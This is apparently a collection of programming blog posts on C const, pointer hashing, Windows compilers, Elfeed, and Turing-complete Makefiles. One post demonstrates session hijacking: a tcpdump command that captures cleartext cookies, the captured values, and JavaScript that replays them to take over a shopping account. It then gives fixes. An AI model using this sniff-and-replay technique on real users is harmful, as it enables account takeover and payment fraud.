null program

Const and Optimization in C

Today there was a question on /r/C_Programming about the effect of C’s const on optimization. Variations of this question have been asked many times over the past two decades. Personally, I blame naming of const.

Given this program:

void foo(const int *);

    int x = 0;
    int y = 0;
    for (int i = 0; i < 10; i++) {
        y += x;  // this load not optimized out
    return y;

The function foo takes a const pointer pointer to const, which is a promise from the author of foo that it won’t modify the value of x. Given this information, it would seem the compiler may assume x is always zero, and therefore y is always zero.

However, inspecting the assembly output of several different compilers shows that x is loaded each time around the loop. Here’s gcc 4.9.2 at -O3, with annotations.

     push   rbp
     push   rbx
     xor    ebp, ebp              ; y = 0
     mov    ebx, 0xa              ; loop variable i
     sub    rsp, 0x18             ; allocate x
     mov    dword [rsp+0xc], 0    ; x = 0

.L0: lea    rdi, [rsp+0xc]        ; compute &x
     call   foo
     add    ebp, dword [rsp+0xc]  ; y += x  (not optmized?)
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x18             ; deallocate x
     mov    eax, ebp              ; return y
     pop    rbx
     pop    rbp

The output of clang 3.5 (with -fno-unroll-loops) is the same, except ebp and ebx are swapped, and the computation of &x is hoisted out of the loop, into r14.

Are both compilers failing to take advantage of this useful information? Wouldn’t it be undefined behavior for foo to modify x? Surprisingly, the answer is no. In this situation, this would be a perfectly legal definition of foo.

foo(const int *readonly_x)
    int *x = (int *)readonly_x;  // cast away const

The key thing to remember is that const doesn’t mean constant. Chalk it up as a misnomer. It’s not an optimization tool. It’s there to inform programmers — not the compiler — as a tool to catch a certain class of mistakes at compile time. I like it in APIs because it communicates how a function will use certain arguments, or how the caller is expected to handle returned pointers. It’s usually not strong enough for the compiler to change its behavior.

Despite what I just said, occasionally the compiler can take advantage of const for optimization. The C99 specification, in §6.7.3¶5, has one sentence just for this:

If an attempt is made to modify an object defined with a const-qualified type through use of an lvalue with non-const-qualified type, the behavior is undefined.

The original x wasn’t const-qualified, so this rule didn’t apply. And there aren’t any rules against casting away const to modify an object that isn’t itself const. This means the above (mis)behavior of foo isn’t undefined behavior for this call. Notice how the undefined-ness of foo depends on how it was called.

With one tiny tweak to bar, I can make this rule apply, allowing the optimizer do some work on it.

    const int x = 0;

The compiler may now assume that foo modifying x is undefined behavior, therefore it never happens. For better or worse, this is a major part of how a C optimizer reasons about your programs. The compiler is free to assume x never changes, allowing it to optimize out both the per-iteration load and y.

     push   rbx
     mov    ebx, 0xa            ; loop variable i
     sub    rsp, 0x10           ; allocate x
     mov    dword [rsp+0xc], 0  ; x = 0

.L0: lea    rdi, [rsp+0xc]      ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x10           ; deallocate x
     xor    eax, eax            ; return 0
     pop    rbx

The load disappears, y is gone, and the function always returns zero.

Curiously, the specification allows the compiler to go even further. It’s permitted to allocate x somewhere off the stack, even in read-only memory. For example, it could perform a transformation like this:

static int __x = 0;

    for (int i = 0; i < 10; i++)
    return 0;

Or on x86-64 (-fPIC, small code model), where we can see a few more instructions shaved off:

section .rodata
x:   dd     0

section .text
     push   rbx
     mov    ebx, 0xa        ; loop variable i

.L0: lea    rdi, [rel x]    ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     xor    eax, eax        ; return 0
     pop    rbx

Neither clang nor gcc took it this far, perhaps because it’s more disruptive to badly-behaved programs.

Even with this special const rule, only use const for yourself and for your fellow human programmers. Let the optimizer reason for itself about what is constant and what is not.

tags: [ c x86 ]

Stealing Session Cookies with Tcpdump

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst <addr> and dst port <port>). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

tags: [ ]

Elfeed, cURL, and You

This morning I pushed out an important update to Elfeed, my web feed reader for Emacs. The update should be available in MELPA by the time you read this. Elfeed now has support for fetching feeds using a cURL through a curl inferior process. You’ll need the program in your PATH or configured through elfeed-curl-program-name.

I’ve been using it for a couple of days now, but, while I work out the remaining kinks, it’s disabled by default. So in addition to having cURL installed, you’ll need to set elfeed-use-curl to non-nil. Sometime soon it will be enabled by default whenever cURL is available. The original url-retrieve fetcher will remain in place for time time being. However, cURL may become a requirement someday.

Fetching with a curl inferior process has some huge advantages.

It’s much faster

The most obvious change is that you should experience a huge speedup on updates and better responsiveness during updates after the first cURL run. There are important two reasons:

Asynchronous DNS and TCP: Emacs 24 and earlier performs DNS queries synchronously even for asynchronous network processes. This is being fixed on some platforms (including Linux) in Emacs 25, but now we don’t have to wait.

On Windows it’s even worse: the TCP connection is also established synchronously. This is especially bad when fetching relatively small items such as feeds, because the DNS look-up and TCP handshake dominate the overall fetch time. It essentially makes the whole process synchronous.

Conditional GET: HTTP has two mechanism to avoid transmitting information that a client has previously fetched. One is the Last-Modified header delivered by the server with the content. When querying again later, the client echos the date back like a token in the If-Modified-Since header.

The second is the “entity tag,” an arbitrary server-selected token associated with each version of the content. The server delivers it along with the content in the ETag header, and the client hands it back later in the If-None-Match header, sort of like a cookie.

This is highly valuable for feeds because, unless the feed is particularly active, most of the time the feed hasn’t been updated since the last query. This avoids sending anything other hand a handful of headers each way. In Elfeed’s case, it means it doesn’t have to parse the same XML over and over again.

Both of these being outside of cURL’s scope, Elfeed has to manage conditional GET itself. I had no control over the HTTP headers until now, so I couldn’t take advantage of it. Emacs’ url-retrieve function allows for sending custom headers through dynamically binding url-request-extra-headers, but this isn’t available when calling url-queue-retrieve since the request itself is created asynchronously.

Both the ETag and Last-Modified values are stored in the database and persist across sessions. This is the reason the full speedup isn’t realized until the second fetch. The initial cURL fetch doesn’t have these values.

Fewer bugs

As mentioned previously, Emacs has a built-in URL retrieval library called url. The central function is url-retrieve which asynchronously fetches the content at an arbitrary URL (usually HTTP) and delivers the buffer and status to a callback when it’s ready. There’s also a queue front-end for it, url-queue-retrieve which limits the number of parallel connections. Elfeed hands this function a pile of feed URLs all at once and it fetches them N at a time.

Unfortunately both these functions are incredibly buggy. It’s been a thorn in my side for years.

Here’s what the interface looks like for both:


It takes a URL and a callback. Seeing this, the sane, unsurprising expectation is the callback will be invoked exactly once for time url-retrieve was called. In any case where the request fails, it should report it through the callback. This is not the case. The callback may be invoked any number of times, including zero.

In this example, suppose you have a webserver on port 8080 that will return an HTTP 404 at the given URL. Below, I fire off 10 asynchronous requests in a row.

(defvar results ())
(dotimes (i 10)
  (url-retrieve ""
                (lambda (status) (push (cons i status) results))))

What would you guess is the length of results? It’s initially 0 before any requests complete and over time (a very short time) I would expect this to top out at 10. On Emacs 24, here’s the real answer:

(length results)
;; => 46

The same error is reported multiple times to the callback. At least the pattern is obvious.

(cl-count 0 results :key #'car)
;; => 9
(cl-count 1 results :key #'car)
;; => 8
(cl-count 2 results :key #'car)
;; => 7

(cl-count 9 results :key #'car)
;; => 1

Here’s another one, this time to the non-existent foo.example. The DNS query should never resolve.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://foo.example/"
                (lambda (status) (push (cons i status) results))))

What’s the length of results? This time it’s zero. Remember how DNS is synchronous? Because of this, DNS failures are reported synchronously as a signaled error. This gets a lot worse with url-queue-retrieve. Since the request is put off until later, DNS doesn’t fail until later, and you get neither a callback nor an error signal. This also puts the queue in a bad state and necessitated elfeed-unjam for manually clear it. This one should get fixed in Emacs 25 when DNS is asynchronous.

This last one assumes you don’t have anything listening on port 57432 (pulled out of nowhere) so that the connection fails.

(setf results ())
(dotimes (i 10)
  (url-retrieve ""
                (lambda (status) (push (cons i status) results))))

On Linux, we finally get the sane result of 10. However, on Windows, it’s zero. The synchronous TCP connection will fail, signaling an error just like DNS failures. Not only is it broken, it’s broken in different ways on different platforms.

There are many more cases of callback weirdness which depend on the connection and HTTP session being in various states when thing go awry. These were just the easiest to demonstrate. By using cURL, I get to bypass this mess.

No more GnuTLS issues

At compile time, Emacs can optionally be linked against GnuTLS, giving it robust TLS support so long as the shared library is available. url-retrieve uses this for fetching HTTPS content. Unfortunately, this library is noisy and will occasionally echo non-informational messages in the minibuffer and in *Messages* that cannot be suppressed.

When not linked against GnuTLS, Emacs will instead run the GnuTLS command line program as an inferior process, just like Elfeed now does with cURL. Unfortunately this interface is very slow and frequently fails, basically preventing Elfeed from fetching HTTPS feeds. I suspect it’s in part due to an improper coding-system-for-read.

cURL handles all the TLS negotation itself, so both these problems disappear. The compile-time configuration doesn’t matter.

Windows is now supported

Emacs’ Windows networking code is so unstable, even in Emacs 25, that I couldn’t make any practical use of Elfeed on that platform. Even the Cygwin emacs-w32 version couldn’t cut it. It hard crashes Emacs every time I’ve tried to fetch feeds. Fortunately the inferior process code is a whole lot more stable, meaning fetching with cURL works great. As of today, you can now use Elfeed on Windows. The biggest obstable is getting cURL installed and configured.

Interface changes

With cURL, obviously the values of url-queue-timeout and url-queue-parallel-processes no longer have any meaning to Elfeed. If you set these for yourself, you should instead call the functions elfeed-set-timeout and elfeed-set-max-connections, which will do the appropriate thing depending on the value of elfeed-use-curl. Each also comes with a getter so you can query the current value.

The deprecated elfeed-max-connections has been removed.

Feed objects now have meta tags :etag, :last-modified, and :canonical-url. The latter can identify feeds that have been moved, though it needs a real UI.

See any bugs?

If you use Elfeed, grab the current update and give the cURL fetcher a shot. Please open a ticket if you find problems. Be sure to report your Emacs version, operating system, and cURL version.

As of this writing there’s just one thing missing compared to url-queue: connection reuse. cURL supports it, so I just need to code it up.

tags: [ emacs elfeed ]

Four Ways to Compile C for Windows

I primarily work on and develop for unix-like operating systems — Linux in particular. However, when it comes to desktop applications, most potential users are on Windows. Rather than develop on Windows, which I’d rather avoid, I’ll continue developing, testing, and debugging on Linux while keeping portability in mind. Unfortunately every option I’ve found for building Windows C programs has some significant limitations. These limitations advise my approach to portability and restrict the C language features used by the program for all platforms.

As of this writing I’ve identified four different practical ways to build C applications for Windows. This information will definitely become further and further out of date as this article ages, so if you’re visiting from the future take a moment to look at the date. Except for LLVM shaking things up recently, development tooling on unix-like systems has had the same basic form for the past 15 years (i.e. dominated by GCC). While Visual C++ has been around for more than two decades, the tooling on Windows has seen more churn by comparison.

Before I get into the specifics, let me point out a glaring problem common to all four: Unicode arguments and filenames. Microsoft jumped the gun and adopted UTF-16 early. UTF-16 is a kludge, a worst of all worlds, being a variable length encoding (surrogate pairs), backwards incompatible (unlike UTF-8), and having byte-order issues (BOM). Most Win32 functions that accept strings generally come in two flavors, ANSI and UTF-16. The standard, portable C library functions wrap the ANSI-flavored functions. This means portable C programs can’t interact with Unicode filenames. They must call the non-portable, Windows-specific versions. This includes main itself, which is only handed ANSI-truncated arguments.

Compare this to unix-like systems, which generally adopted UTF-8, but rather as a convention than as a hard rule. The operating system doesn’t know or care about Unicode. Program arguments and filenames are just zero-terminated bytestrings. Implicitly decoding these as UTF-8 would be a mistake anyway. What happens when the encoding isn’t valid?

This doesn’t have to be a problem on Windows. A Windows standard C library could connect to Windows’ Unicode-flavored functions and encode to/from UTF-8 as needed, allowing portable programs to maintain the bytestring illusion. It’s only that none of the existing standard C libraries do it this way.


Of course my first natural choice is MinGW, specifically the Mingw-w64 fork. It’s GCC ported to Windows. You can continue relying on GCC-specific features when you need them. It’s got all the core language features up through C11, plus the common extensions. It’s probably packaged by your Linux distribution of choice, making it trivial to cross-compile programs and libraries from Linux — and with Wine you can even execute them on x86. Like regular GCC, it outputs GDB-friendly DWARF debugging information, so you can debug applications with GDB (my favorite).

If I’m using Mingw-w64 on Windows, I prefer to do so from inside Cygwin. Since it provides a complete POSIX environment, it maximizes portability for the whole tool chain. This isn’t strictly required.

However, it has one big flaw. Unlike unix-like systems, Windows doesn’t supply a system standard C library. That’s the compiler’s job. But Mingw-w64 doesn’t have one. Instead it links against msvcrt.dll, which isn’t officially supported by Microsoft. It just happens to exist on modern Windows installations. Since it’s not supported, it’s way out of date and doesn’t support much of C99, let alone C11. A lot of these problems are patched over by the compiler, but if you’re relying on Mingw-w64, you still have to stick to some C89 library features, such as limiting yourself to the C89 printf specifiers.

Update: Mārtiņš Možeiko has pointed out __USE_MINGW_ANSI_STDIO, an undocumented feature that fixes the printf family.

Visual C++

The behemoth usually considered in this situation is Visual Studio and the Visual C++ build tools. I strongly prefer open source development tools, and Visual Studio obviously the least open source option, but at least it’s cost-free these days. Now, I have absolutely no interest in Visual Studio, but fortunately the Visual C++ compiler and associated build tools can be used standalone, supporting both C and C++.

Included is a “vcvars” batch file — vcvars64.bat for x64. Execute that batch file in a cmd.exe console and the Visual C++ command line build tools will be made available in that console and in any programs executed from it (your editor). It includes the compiler (cl.exe), linker (link.exe), assembler (ml64.exe), disassembler (dumpbin.exe), and more. It also includes a mostly POSIX-complete make called nmake.exe. All these tools are noisy and print a copyright banner on every invocation, so get used to passing -nologo every time, which suppresses some of it.

When I said behemoth, I meant it. In my experience it literally takes hours (unattended) to install Visual Studio 2015. The good news is you don’t actually need it all anymore. The build tools are available standalone. While it’s still a larger and slower installation process than it really should be, it’s is much more reasonable to install. It’s good enough that I’d even say I’m comfortable relying on it for Windows builds.

That being said, it’s not without its flaws. Microsoft has never announced any plans to support C99. They only care about C++, with C as a second class citizen. Since C++11 incorporated most of C99 and Microsoft supports C++11, Visual Studio 2015 very nearly supports all of C99, even more than Mingw-w64. The only things missing as far as I can tell are variable length arrays (VLAs), complex numbers, and C99’s array parameter declarators, since none of these were adopted by C++. Some C99 features are considered extensions (as they would be for C89), so you’ll also get warnings about them, which can be disabled.

The command line interface (option flags, intermediates, etc.) isn’t quite reconcilable with the unix-like ecosystem (i.e. GCC, Clang), so you’ll need separate Makefiles, or you’ll need to use a build system that generates Visual C++ Makefiles.

Debugging is a major problem. Visual C++ outputs separate .pdb program database files, which aren’t usable from GDB. Visual Studio has a built-in debugger, though it’s not included in the standalone Visual C++ build tools. I’m still searching for a decent debugging solution for this scenario. I tried WinDbg, but I can’t stand it.

In general the output code performance is on par with GCC and Clang, so you’re not really gaining or losing performance with Visual C++.


Unsurprisingly, Clang has been ported to Windows. It’s like Mingw-w64 in that you get the same features and interface across platforms.

Unlike Mingw-w64, it doesn’t link against msvcrt.dll. Instead it relies directly on the official Windows SDK. You’ll basically need to install the Visual C++ build tools as if were going to build with Visual C++. This means no practical cross-platform builds and you’re still relying on the proprietary Microsoft toolchain. In the past you even had to use Microsoft’s linker, but LLVM now provides its own.

It generates GDB-friendly DWARF debug information (in addition to CodeView) so in theory you can debug with GDB again. I haven’t given this a thorough evaluation yet.

Pelles C

Finally there’s Pelles C. It’s cost-free but not open source. It’s a reasonable, small install that includes a full IDE with an integrated debugger and command line tools. It has its own C library and Win32 SDK with the most complete C11 support around. It also supports OpenMP 3.1. All in all it’s pretty nice and is something I wouldn’t be afraid to rely upon for Windows builds.

Like Visual C++, it has a couple of “povars” batch files to set up the right environment, which includes a C compiler, linker, assembler, etc. The compiler interface mostly mimics cl.exe, though there are far fewer code generation options. The make program, pomake.exe, mimics nmake.exe, but is even less POSIX-complete. The compiler’s output code performance is also noticeably poorer than GCC, Clang, and Visual C++. It’s definitely a less mature compiler.

It outputs CodeView debugging information, so GDB is of no use. The best solution is to simply use the compiler built into the IDE, which can be invoked directly from the command line. You don’t normally need to code from within the IDE just to use the debugger.

Like Visual C++, it’s Windows only, so cross-compilation isn’t really in the picture.

If performance isn’t of high importance, and you don’t require specific code generation options, then Pelles C is a nice choice for Windows builds.

Other Options

I’m sure there are a few other options out there, and I’d like to hear about them so I can try them out. I focused on these since they’re all cost free and easy to download. If I have to register or pay, then it’s not going to beat these options.

tags: [ c cpp win32 ]

You Can't Always Hash Pointers in C

Occasionally I’ve needed to key a hash table with C pointers. I don’t care about the contents of the object itself — especially if it might change — just its pointer identity. For example, suppose I’m using null-terminated strings as keys and I know these strings will always be interned in a common table. These strings can be compared directly by their pointer values (str_a == str_b) rather than, more slowly, by their contents (strcmp(str_a, str_b) == 0). The intern table ensures that these expressions both have the same result.

As a key in a hash table, or other efficient map/dictionary data structure, I’ll need to turn pointers into numerical values. However, C pointers aren’t integers. Following certain rules it’s permitted to cast pointers to integers and back, but doing so will reduce the program’s portability. The most important consideration is that the integer form isn’t guaranteed to have any meaningful or stable value. In other words, even in a conforming implementation, the same pointer might cast to two different integer values. This would break any algorithm that isn’t keenly aware of the implementation details.

To show why this is, I’m going to be citing the relevant parts of the C99 standard (ISO/IEC 9899:1999). The draft for C99 is freely available (and what I use myself since I’m a cheapass). My purpose is not to discourage you from casting pointers to integers and using the result. The vast majority of the time this works fine and as you would expect. I just think it’s an interesting part of the language, and C/C++ programmers should be aware of potential the trade-offs.

Integer to pointer casts

What does the standard have to say about casting pointers to integers? §¶5:

An integer may be converted to any pointer type. Except as previously specified, the result is implementation-defined, might not be correctly aligned, might not point to an entity of the referenced type, and might be a trap representation.

It also includes a footnote:

The mapping functions for converting a pointer to an integer or an integer to a pointer are intended to be consistent with the addressing structure of the execution environment.

Casting an integer to a pointer depends entirely on the implementation. This is intended for things like memory mapped hardware. The programmer may need to access memory as a specific physical address, which would be encoded in the source as an integer constant and cast to a pointer of the appropriate type.

    return *(int *)0x1ffc;

It may also be used by a loader and dynamic linker to compute the virtual address of various functions and variables, then cast to a pointer before use.

Both cases are already dependent on implementation defined behavior, so there’s nothing lost in relying on these casts.

An integer constant expression of 0 is a special case. It casts to a NULL pointer in all implementations (§¶3). However, a NULL pointer doesn’t necessarily point to address zero, nor is it necessarily a zero bit pattern (i.e. beware memset and calloc on memory with pointers). It’s just guaranteed never to compare equally with a valid object, and it is undefined behavior to dereference.

Pointer to integer casts

What about the other way around? §¶6:

Any pointer type may be converted to an integer type. Except as previously specified, the result is implementation-defined. If the result cannot be represented in the integer type, the behavior is undefined. The result need not be in the range of values of any integer type.

Like before, it’s implementation defined. However, the negatives are a little stronger: the cast itself may be undefined behavior. I speculate this is tied to integer overflow. The last part makes pointer to integer casts optional for an implementation. This is one way that the hash table above would be less portable.

When the cast is always possible, an implementation can provide an integer type wide enough to hold any pointer value. §¶1:

The following type designates a signed integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:


The following type designates an unsigned integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:


These types are optional.

The take-away is that the integer has no meaningful value. The only guarantee is that the integer can be cast back into a void pointer that will compare equally. It would be perfectly legal for an implementation to pass these assertions (and still sometimes fail).

example(void *prt_a, void *ptr_b)
    if (ptr_a == ptr_b) {
        uintptr_t int_a = (uintptr_t)ptr_a;
        uintptr_t int_b = (uintptr_t)ptr_b;
        assert(int_a != int_b);
        assert((void *)int_a == (void *)int_b);

Since the bits don’t have any particular meaning, arithmetic operations involving them will also have no meaning. When a pointer might map to two different integers, the hash values might not match up, breaking hash tables that rely on them. Even with uintptr_t provided, casting pointers to integers isn’t useful without also relying on implementation defined properties of the result.

Reasons for this pointer insanity

What purpose could such strange pointer-to-integer casts serve?

A security-conscious implementation may choose to annotate pointers with additional information by setting unused bits. It might be for baggy bounds checks or, someday, in an undefined behavior sanitizer. Before dereferencing annotated pointers, the metadata bits would be checked for validity, and cleared/set before use as an address. Or it may map the same object at multiple virtual addresses) to avoid setting/clearing the metadata bits, providing interoperability with code unaware of the annotations. When pointers are compared, these bits would be ignored.

When these annotated pointers are cast to integers, the metadata bits will be present, but a program using the integer wouldn’t know their meaning without tying itself closely to that implementation. Completely unused bits may even be filled with random garbage when cast. It’s allowed.

You may have been thinking before about using a union or char * to bypass the cast and access the raw pointer bytes, but you’d run into the same problems on the same implementations.

Conforming programs

The standard makes a distinction between strictly conforming programs (§4¶5) and conforming programs (§4¶7). A strictly conforming program must not produce output depending on implementation defined behavior nor exceed minimum implementation limits. Very few programs fit in this category, including any program using uintptr_t since it’s optional. Here are more examples of code that isn’t strictly conforming:

    printf("%zu", sizeof(int)); // §
    printf("%d", -1 >> 1);      // §6.5¶4
    printf("%d", MAX_INT);      // §

On the other hand, a conforming program is allowed to depend on implementation defined behavior. Relying on meaningful, stable values for pointers cast to uintptr_t/intptr_t is conforming even if your program may exhibit bugs on some implementations.

tags: [ c cpp ]

Makefile Assignments are Turing-Complete

For over a decade now, GNU Make has almost exclusively been my build system of choice, either directly or indirectly. Unfortunately this means I unnecessarily depend on some GNU extensions — an annoyance when porting to the BSDs. In an effort to increase the portability of my Makefiles, I recently read the POSIX make specification. I learned two important things: 1) POSIX make is so barren it’s not really worth striving for, and 2) make’s macro assignment mechanism is Turing-complete.

If you want to see it in action for yourself before reading further, here’s a Makefile that implements Conway’s Game of Life (40x40) using only macro assignments.

Run it with any make program in an ANSI terminal. It must literally be named life.mak. Beware: if you run it longer than a few minutes, your computer may begin thrashing.

make -f life.mak

It’s 100% POSIX-compatible except for the sleep 0.1 (fractional sleep), which is only needed for visual effect.

A POSIX workaround

Unlike virtually every real world implementation, POSIX make doesn’t support conditional parts. For example, you might want your Makefile’s behavior to change depending on the value of certain variables. In GNU Make it looks like this:

ifdef USE_FOO
    EXTRA_FLAGS = -ffoo -lfoo
    EXTRA_FLAGS = -Wbar

Or BSD-style:

.ifdef USE_FOO
    EXTRA_FLAGS = -ffoo -lfoo
    EXTRA_FLAGS = -Wbar

If the goal is to write a strictly POSIX Makefile, how could I work around the lack of conditional parts and maintain a similar interface? The selection of macro/variable to evaluate can be dynamically selected, allowing for some useful tricks. First define the option’s default:


Then define both sets of flags:

EXTRA_FLAGS_1 = -ffoo -lfoo

Now dynamically select one of these macros for assignment to EXTRA_FLAGS.


The assignment on the command line overrides the assignment in the Makefile, so the user gets to override USE_FOO.

$ make              # EXTRA_FLAGS = -Wbar
$ make USE_FOO=0    # EXTRA_FLAGS = -Wbar
$ make USE_FOO=1    # EXTRA_FLAGS = -ffoo -lfoo

Before reading the POSIX specification, I didn’t realize that the left side of an assignment can get the same treatment. For example, if I really want the “if defined” behavior back, I can use the macro to mangle the left-hand side. For example,


Caveat: If DEBUG is set to empty, it may still result in true for ifdef depending on which make flavor you’re using, but will always appear to be unset in this hack.

$ make             # EXTRA_FLAGS = -O3 -DNDEBUG
$ make DEBUG=yes   # EXTRA_FLAGS = -O0 -g3

This last case had me thinking: This is very similar to the (ab)use of the x86 mov instruction in mov is Turing-complete. These macro assignments alone should be enough to compute any algorithm.

Macro Operations

Macro names are just keys to a global associative array. This can be used to build lookup tables. Here’s a Makefile to “compute” the square root of integers between 0 and 10.

sqrt_0  = 0.000000
sqrt_1  = 1.000000
sqrt_2  = 1.414214
sqrt_3  = 1.732051
sqrt_4  = 2.000000
sqrt_5  = 2.236068
sqrt_6  = 2.449490
sqrt_7  = 2.645751
sqrt_8  = 2.828427
sqrt_9  = 3.000000
sqrt_10 = 3.162278
result := $(sqrt_$(n))

The BSD flavors of make have a -V option for printing variables, which is an easy way to retrieve output. I used an “immediate” assignment (:=) for result since some versions of make won’t evaluate the expression before -V printing.

$ make -f sqrt.mak -V result n=8

Without -V, a default target could be used instead:

output :
        @printf "$(result)\n"

There are no math operators, so performing arithmetic requires some creativity. For example, integers could be represented as a series of x characters. The number 4 is xxxx, the number 6 is xxxxxx, etc. Addition is concatenation (note: macros can have + in their names):

A      = xxx
B      = xxxx
A+B    = $(A)$(B)

However, since there’s no way to “slice” a value, subtraction isn’t possible. A more realistic approach to arithmetic would require lookup tables.


Branching could be achieved through more lookup tables. For example,

square_0  = 1
square_1  = 2
square_2  = 4
# ...
result := $($(op)_$(n))

And called as:

$ make n=5 op=sqrt    # 2.236068
$ make n=5 op=square  # 25

Or using the DEBUG trick above, use the condition to mask out the results of the unwanted branch. This is similar to the mov paper.

result           := $(op)($(n)) = $($(op)_$(n))
result$(verbose) := $($(op)_$(n))

And its usage:

$ make n=5 op=square             # 25
$ make n=5 op=square verbose=1   # square(5) = 25

What about loops?

Looping is a tricky problem. However, one of the most common build (anti?)patterns is the recursive Makefile. Borrowing from the mov paper, which used an unconditional jump to restart the program from the beginning, for a Makefile Turing-completeness I can invoke the Makefile recursively, restarting the program with a new set of inputs.

Remember the print target above? I can loop by invoking make again with new inputs in this target,

output :
    @printf "$(result)\n"
    @$(MAKE) $(args)

Before going any further, now that loops have been added, the natural next question is halting. In reality, the operating system will take care of that after some millions of make processes have carelessly been invoked by this horribly inefficient scheme. However, we can do better. The program can clobber the MAKE variable when it’s ready to halt. Let’s formalize it.

loop = $(MAKE) $(args)
output :
    @printf "$(result)\n"

To halt, the program just needs to clear loop.

Suppose we want to count down to 0. There will be an initial count:

count = 6

A decrement table:

6  = 5
5  = 4
4  = 3
3  = 2
2  = 1
1  = 0
0  = loop

The last line will be used to halt by clearing the name on the right side. This is three star territory.

$($($(count))) =

The result (current iteration) loop value is computed from the lookup table.

result = $($(count))

The next loop value is passed via args. If loop was cleared above, this result will be discarded.

args = count=$(result)

With all that in place, invoking the Makefile will print a countdown from 5 to 0 and quit. This is the general structure for the Game of Life macro program.

Game of Life

A universal Turing machine has been implemented in Conway’s Game of Life. With all that heavy lifting done, one of the easiest methods today to prove a language’s Turing-completeness is to implement Conway’s Game of Life. Ignoring the criminal inefficiency of it, the Game of Life Turing machine could be run on the Game of Life simulation running on make’s macro assignments.

In the Game of Life program — the one linked at the top of this article — each cell is stored in a macro named xxyy, after its position. The top-left most cell is named 0000, then going left to right, 0100, 0200, etc. Providing input is a matter of assigning each of these macros. I chose X for alive and - for dead, but, as you’ll see, any two characters permitted in macro names would work as well.

$ make 0000=X 0100=- 0200=- 0300=X ...

The next part should be no surprise: The rules of the Game of Life are encoded as a 512-entry lookup table. The key is formed by concatenating the cell’s value along with all its neighbors, with itself in the center.

The “beginning” of the table looks like this:

--------- = -
X-------- = -
-X------- = -
XX------- = -
--X------ = -
X-X------ = -
-XX------ = -
XXX------ = X
---X----- = -
X--X----- = -
-X-X----- = -
XX-X----- = X
# ...

Note: The two right-hand X values here are the cell coming to life (exactly three living neighbors). Computing the next value (n0101) for 0101 is done like so:

n0101 = $($(0000)$(0100)$(0200)$(0001)$(0101)$(0201)$(0002)$(0102)$(0202))

Given these results, constructing the input to the next loop is simple:

args = 0000=$(n0000) 0100=$(n0100) 0200=$(n0200) ...

The display output, to be given to printf, is built similarly:

output = $(n0000)$(n0100)$(n0200)$(n0300)...

In the real version, this is decorated with an ANSI escape code that clears the terminal. The printf interprets the escape byte (\033) so that it doesn’t need to appear literally in the source.

And that’s all there is to it: Conway’s Game of Life running in a Makefile. Life, uh, finds a way.

tags: [ lang compsci ]

Mapping Multiple Memory Views in User Space

Modern operating systems run processes within virtual memory using a piece of hardware called a memory management unit (MMU). The MMU contains a page table that defines how virtual memory maps onto physical memory. The operating system is responsible for maintaining this page table, mapping and unmapping virtual memory to physical memory as needed by the processes it’s running. If a process accesses a page that is not currently mapped, it will trigger a page fault and the execution of the offending thread will be paused until the operating system maps that page.

